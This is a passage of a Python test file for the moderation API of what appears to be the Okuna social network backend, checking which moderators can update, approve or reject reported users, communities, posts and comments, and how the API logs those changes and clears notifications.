] | 188 | 2019-03-16T09:53:25.000Z | 2019-07-25T14:57:24.000Z | openbook_moderation/tests/views/moderated_object.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 80 | 2019-08-03T17:49:08.000Z | 2022-02-28T16:56:33.000Z | import json
import tempfile
from PIL import Image
from django.core.files import File
from django.urls import reverse
from django.utils import timezone
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
from openbook_auth.models import User
from openbook_common.tests.helpers import make_global_moderator, make_user, make_moderation_category, \
make_authentication_headers_for_user, make_moderated_object_description, \
make_community, make_fake_post_text, make_fake_post_comment_text, make_moderated_object, make_moderated_object_log, \
make_moderated_object_report, make_reactions_emoji_group, make_emoji, make_circle
from openbook_common.utils.model_loaders import get_user_new_post_notification_model, \
get_community_new_post_notification_model, get_post_comment_notification_model, \
get_post_comment_reaction_notification_model, get_post_comment_reply_notification_model, \
get_post_comment_user_mention_notification_model, get_post_comment_user_mention_model, \
get_post_reaction_notification_model, get_post_user_mention_model, get_post_user_mention_notification_model, \
get_community_invite_notification_model, get_follow_notification_model, get_connection_request_notification_model, \
get_connection_confirmed_notification_model
from openbook_communities.models import Community
from openbook_moderation.models import ModeratedObject, ModeratedObjectDescriptionChangedLog, \
ModeratedObjectCategoryChangedLog, ModerationPenalty, ModerationCategory, ModeratedObjectStatusChangedLog, \
ModeratedObjectVerifiedChangedLog
from openbook_posts.models import Post, PostComment
fake = Faker()
class ModeratedObjectAPITests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_update_user_moderated_object_if_global_moderator(self):
"""
should be able to update a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_can_update_user_moderated_object_if_approved(self):
"""
should be able to update a user moderated object if approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_can_update_user_moderated_object_if_rejected(self):
"""
should be able to update a user moderated object if rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_cant_update_moderated_object_if_verified(self):
"""
should not be able to update a user moderated object if already verified
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object_with_id(moderated_object_id=moderated_object.pk)
global_moderator.verify_moderated_object_with_id(moderated_object_id=moderated_object.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
category_id=report_category.pk,
description__isnull=True,
object_id=user.pk,
).exists())
def test_cant_update_user_moderated_object_if_not_global_moderator(self):
"""
should not be able to update a user moderated object if not a global moderator
"""
non_global_moderator = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_cant_update_user_moderated_object_if_community_moderator(self):
"""
should not be able to update a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
user = make_user()
user.join_community_with_name(community_name=community.name)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_creates_description_changed_log_on_update(self):
"""
should create a description changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectDescriptionChangedLog.objects.filter(
changed_from__isnull=True,
changed_to=new_moderated_object_description,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_creates_category_changed_log_on_update(self):
"""
should create a category changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'category_id': new_moderated_object_category.pk,
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectCategoryChangedLog.objects.filter(
changed_from=report_category,
changed_to=new_moderated_object_category,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_can_update_community_moderated_object_if_global_moderator(self):
"""
should be able to update a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_community_with_name(community_name=community.name, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_cant_update_community_moderated_object_if_not_global_moderator(self):
"""
should not be able to update a community moderated object if not a global moderator
"""
non_global_moderator = make_user()
community = make_community()
report_category = make_moderation_category()
non_global_moderator.report_community_with_name(community_name=community.name,
category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_cant_update_community_moderated_object_if_community_moderator(self):
"""
should not be able to update a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
username=community_moderator.username,
community_name=community.name)
user = make_user()
user.join_community_with_name(community_name=community.name)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_community_with_name(community_name=community.name,
category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_can_update_community_post_moderated_object_if_global_moderator(self):
"""
should be able to update a community post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_can_update_community_post_moderated_object_if_community_moderator(self):
"""
should be able to update a community post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_cant_update_community_post_moderated_object_if_not_global_nor_community_moderator(self):
"""
should not be able to update a community post moderated object if not global nor community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
non_moderator = make_user()
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_verified(self):
"""
community moderator should not be able to update a community post moderated object if already verified
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_approved(self):
"""
community moderator should not be able to update a community post moderated object if status is approved
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
community_moderator.approve_moderated_object_with_id(moderated_object_id=moderated_object.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_rejected(self):
"""
community moderator should not be able to update a community post moderated object if status is rejected
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
community_moderator.reject_moderated_object_with_id(moderated_object_id=moderated_object.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_can_update_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to update a community post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_can_update_community_post_comment_moderated_object_if_community_moderator(self):
"""
should be able to update a community post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_cant_update_community_post_comment_moderated_object_if_not_global_nor_community_moderator(self):
"""
should not be able to update a community post_comment moderated object if not global nor community moderator
"""
non_global_moderator = make_user()
community = make_community()
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_verified(self):
"""
community moderator should not be able to update a community post_comment moderated object if already verified
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_approved(self):
"""
community moderator should not be able to update a community post_comment moderated object if status is approved
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
community_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_rejected(self):
"""
community moderator should not be able to update a community post_comment moderated object if status is rejected
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
community_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def _get_url(self, moderated_object):
return reverse('moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class ApproveModeratedObjectApiTests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_approve_user_moderated_object_if_global_moderator(self):
"""
should be able to approve a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_APPROVED
).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_new_post_notifications(self):
"""
should remove all user new post notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
# subscribe to notifications
reporter_user.enable_new_post_notifications_for_user_with_username(username=user.username)
post = user.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
UserNewPostNotification = get_user_new_post_notification_model()
self.assertFalse(UserNewPostNotification.objects.filter(post=post).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_follow_notifications(self):
"""
should remove all user follow notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
followed_user = make_user()
user.follow_user(user=followed_user)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
FollowNotification = get_follow_notification_model()
self.assertFalse(FollowNotification.objects.filter(follower=user).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_connection_request_notifications(self):
"""
should remove all user connection request notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
requested_user = make_user()
user.connect_with_user_with_id(requested_user.pk)
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
ConnectionRequestNotification = get_connection_request_notification_model()
self.assertFalse(ConnectionRequestNotification.objects.filter(connection_requester=user).exists())
def test_approving_user_moderated_object_for_severity_critical_deletes_user_connection_confirmed_notifications(self):
"""
should remove all user connection confirmed notifications on approval of a user moderated object for severity critical
"""
global_moderator = make_global_moderator()
user = make_user()
circle = make_circle(creator=user)
reporter_user = make_user()
connection_requester = make_user()
connection_requester.connect_with_user_with_id(user.pk)
user.confirm_connection_with_user_with_id(user_id=connection_requester.pk, circles_ids=[circle.pk])
ConnectionConfirmedNotification = get_connection_confirmed_notification_model()
self.assertTrue(ConnectionConfirmedNotification.objects.filter(connection_confirmator=user).exists())
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(ConnectionConfirmedNotification.objects.filter(connection_confirmator=user).exists())
def test_cant_approve_user_moderated_object_if_community_moderator(self):
"""
should not be able to approve a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
